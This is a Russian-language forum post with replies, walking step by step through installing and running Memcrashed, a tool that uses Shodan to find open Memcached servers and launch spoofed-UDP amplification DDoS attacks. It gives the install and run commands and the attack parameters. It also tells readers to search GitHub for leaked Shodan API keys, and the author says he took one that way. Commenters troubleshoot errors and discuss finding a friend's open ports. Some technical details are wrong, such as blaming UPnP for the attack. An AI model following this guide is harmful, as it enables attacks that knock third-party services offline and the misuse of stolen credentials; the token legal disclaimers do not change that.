Soft Memcrashed - самый мощный DDoS

В этой статье я познакомлю вас с утилитой Memcrashed.

Screenshot_1.png


Memcrashed - это инструмент, позволяющий использовать Shodan.io для получения сотен уязвимых Memcached серверов. Затем он позволяет использовать те же серверы для запуска широко распространенной атаки типа DDoS путем подделки пакетов UDP, полученных вашей жертвой. Полезная нагрузка по умолчанию включает в себя команду memcached "stats", 10 байтов для отправки, но ответ составляет от 1500 байт до сотен килобайт. Только представьте себе цифры. Очень грозное оружие. Чтобы ознакомится с последствиями уже произведенных атак, просто загуглите. Последствия и мощность просто поражают. 28 февраля 2108 г. на GitHub.com произошла атака мощностью 1,35 Тб/сек.

Данная статья предоставлена исключительно в целях ознакомления, применение на практике влечет за собой ответственность, предусмотренную законодательством вашей страны.

Если вы вдруг не совсем осведомлены:
DoS
(Denial of Service «отказ в обслуживании») — хакерская атака на сервер с целью довести её до отказа, то есть создание таких условий, при которых пользователи системы не смогут получить доступ к предоставляемым системным ресурсам (серверам), либо этот доступ будет затруднён. В настоящее время DoS и DDoS атаки наиболее популярны, так как позволяют довести до отказа практически любую систему, не оставляя юридически значимых улик. И еще, простыми словами DoS - это атака с одного компьютера (зачастую не эффективна), DDoS - это атака выполняемая одновременно с большого числа компьютеров. Не путайте.

Немного теории (принцип работы инструмента):
Амплифицированная DDoS-атака - это тип DDoS-атак с отражением, эксплуатирующий набор сетевых протоколов Universal Plug and Play (UPnP) для отправки амплифицированного потока трафика серверу-жертве. Этот трафик переполняет инфраструктуру атакуемого сервера и приводит к его отказу. Простыми словами серверы memcached имеют возможность работать по протоколу UDP. UDP - это сетевой протокол, который позволяет отправлять данные без предварительного получения так называемого "рукопожатия", представляющего собой сетевой процесс, в котором обе стороны соглашаются установить связь. Протокол UDP используется потому, что для отправки данных целевому серверу, не нужно его предварительное согласие на прием данных, что позволяет отправлять огромное количество данных без подтверждения со стороны целевого сервера.

1.png


Практика
Переходим к установке инструмента. Я буду использовать распространенную в сфере ИБ ОС Kali linux (x64 в моем случаи)
Данный инструмент пылиться в недрах гитхаба. для его установке запускаем Кали, открывает терминал и вводим следующее:
Код:
apt-get update & apt-get upgrade
после обновления переходим к git clone:
Код:
git clone https://github.com/649/Memcrashed-DDoS-Exploit.git
Screenshot_2.png


Далее нужно проверить наличие необходимых для работы инструментов. Ваш ответ будет выглядить немного подругому, так как я уже все устанавливал ранее. при повторном вводе команды, ответ получится как у меня.
сами команды:
Код:
apt-get install python3
Screenshot_3.png


Код:
pip install scapy
Screenshot_4.png


Код:
pip install shodan
Screenshot_5.png


переходим в директорию инструмента:
Код:
cd /Memcrashed-DDoS-Exploit
Screenshot_6.png


и последняя команда:
Код:
pip install -r requirements.txt
Screenshot_7.png


теперь инструмент готов к использованию:
Код:
python3 Memcrashed.py
Screenshot_8.png


Memcrashed просит ввести ему валидный api key shodan (кто не знает шодан - гуглите). api key можно попробовать поискать на github.com по по анологичной фразе: api key //// ApiKey //// ApiKey Shodan /////
примерно 10 минут поиска, и ключ shodan.io у меня в руках (полная платная версия. 3к если не ошибаюсь)

Screenshot_9.png

P/S 45651 сервер..... я не использовал этот инструмент, только ознакомился. Настоятельно не рекомендую использовать его в любых целях.

Инструмент позволяет хранить данные шодан (сервера memcashed) и использовать их без подключения к шодан.
Далее инструмент будет спрашивать есть ли у вас локальные боты (сохраненый поиск шодан) или же искать по api key на шодан. попросит IP (target - цель) и спросит по какому порту бить. тут нужен открытый порт у цели. попросит ввести мощность атаки ( Enter preferred power (Default 1): ) и какой payload использовать ( Enter payload contained inside packet) по умолчанию лучше использовать stats (10 байтов для отправки, ответ от 1500 байт до сотен килобайт).

Так же, как и говорилось выше, программа предложит записать сервера в файл bots.txt (для использования без shodan). " Would you like to display all the bots from Shodan? <Y/n>: " при вводе "y" начнется перечисление серверов на мониторе:

Screenshot_10.png

я остановил этот процесс, так как мне это не нужно. Мы же только ознакамливаемся ;)

Помните, DDoS это уголовно наказуемая деятельность.
 

CHEATKEYS

One Level
18.05.2020
1
1
BIT
0
Код:
Traceback (most recent call last):
  File "Memcrashed.py", line 5, in <module>
    from scapy.all import *
  File "/usr/local/lib/python3.8/dist-packages/scapy/all.py", line 18, in <module>
    from scapy.arch import *
  File "/usr/local/lib/python3.8/dist-packages/scapy/arch/__init__.py", line 28, in <module>
    from scapy.arch.bpf.core import get_if_raw_addr
  File "/usr/local/lib/python3.8/dist-packages/scapy/arch/bpf/core.py", line 11, in <module>
    from scapy.arch.common import get_if, compile_filter
  File "/usr/local/lib/python3.8/dist-packages/scapy/arch/common.py", line 35, in <module>
    TCPDUMP = _check_tcpdump()
  File "/usr/local/lib/python3.8/dist-packages/scapy/arch/common.py", line 30, in _check_tcpdump
    proc = subprocess.Popen([conf.prog.tcpdump, "--version"],
  File "/usr/lib/python3.8/subprocess.py", line 854, in __init__
    self._execute_child(args, executable, preexec_fn, close_fds,
  File "/usr/lib/python3.8/subprocess.py", line 1702, in _execute_child
    raise child_exception_type(errno_num, err_msg, err_filename)
FileNotFoundError: [Errno 2] No such file or directory: 'tcpdump
что это значит?
 
Последнее редактирование модератором:
  • Нравится
Реакции: Daren Frozen

Jack Hudson

Member
31.12.2019
11
0
BIT
0
Я как-то смотрел про порты tcp/udp одинаковы?! Почему я этого понять не могу
 

Sevular

Member
08.01.2020
6
0
BIT
0
А для термукса есть способ запуска?
 
Последнее редактирование модератором:

software

New member
06.10.2020
1
0
BIT
0
Кто поможет с этим????
Код:
Sending 2 forged synchronized payloads to: xx.xxx.xxx.xxx
Traceback (most recent call last):
  File "Memcrashed.py", line 122, in <module>
    send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata), count=1)
  File "/usr/local/lib/python3.8/dist-packages/scapy/sendrecv.py", line 312, in send
    socket = conf.L3socket(*args, **kargs)
  File "/usr/local/lib/python3.8/dist-packages/scapy/arch/linux.py", line 445, in __init__
    self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type))  # noqa: E501
  File "/usr/lib/python3.8/socket.py", line 231, in __init__
    _socket.socket.__init__(self, family, type, proto, fileno)
OSError: [Errno 97] Address family not supported by protocol
Exception ignored in: <function SuperSocket.__del__ at 0x7f818b8c9820>
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/scapy/supersocket.py", line 123, in __del__
    self.close()
  File "/usr/local/lib/python3.8/dist-packages/scapy/arch/linux.py", line 481, in close
    set_promisc(self.ins, self.iface, 0)
AttributeError: 'L3PacketSocket' object has no attribute 'ins'
 

Krang

Green Team
27.04.2020
16
10
BIT
0
Код:
Traceback (most recent call last):
  File "Memcrashed.py", line 5, in <module>
    from scapy.all import *
  File "/usr/local/lib/python3.8/dist-packages/scapy/all.py", line 18, in <module>
    from scapy.arch import *
  File "/usr/local/lib/python3.8/dist-packages/scapy/arch/__init__.py", line 28, in <module>
    from scapy.arch.bpf.core import get_if_raw_addr
  File "/usr/local/lib/python3.8/dist-packages/scapy/arch/bpf/core.py", line 11, in <module>
    from scapy.arch.common import get_if, compile_filter
  File "/usr/local/lib/python3.8/dist-packages/scapy/arch/common.py", line 35, in <module>
    TCPDUMP = _check_tcpdump()
  File "/usr/local/lib/python3.8/dist-packages/scapy/arch/common.py", line 30, in _check_tcpdump
    proc = subprocess.Popen([conf.prog.tcpdump, "--version"],
  File "/usr/lib/python3.8/subprocess.py", line 854, in __init__
    self._execute_child(args, executable, preexec_fn, close_fds,
  File "/usr/lib/python3.8/subprocess.py", line 1702, in _execute_child
    raise child_exception_type(errno_num, err_msg, err_filename)
FileNotFoundError: [Errno 2] No such file or directory: 'tcpdump
что это значит?
sudo apt install tcpdump
и создать симлинк /usr/bin/tcpdump
 
  • Нравится
Реакции: Nimnul

MErequim

One Level
19.11.2020
2
1
BIT
0
Здравствуйте, помогите решить проблему с этой ошибкой, ключ вроде валидный ввожу, но выдает такую ошибку. Мне не хватает какой-то утилиты?
Linux [Работает] - Oracle VM VirtualBox 19.11.2020 1_06_29 (2).png
 

MErequim

One Level
19.11.2020
2
1
BIT
0
А в чем заключается уголовная ответственность если пакеты отправляешь не ты а боты Shodan?
И как вычисляют виновника торжества?
273 статься ук РФ. Ознакомься для начала, а потом уже принимай решения, ддосить или нет)
А как узнать какие порты открыты для Ddosa , например я дудосил себя , естественно в ознокомительных целях , с дефолтным портом и ничего это значит , что мой порт который я выбрал закрыт? Но тогда как я узнаю какой порт открыт например у моего друга , зная его IP?
nmap, кучу всего есть, чтобы узнать какие порты открыты у айпи адреса "жертвы"
 
  • Нравится
Реакции: Jack Hudson

StampyXxx

New member
06.02.2021
3
0
BIT
0
VirtualBox_kali_09_02_2021_14_47_57.png
Помогите пожалуйста что мне нужно сделать ???!! Заранее спасибо
 

WEBhacker

New member
12.06.2021
1
0
BIT
0
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!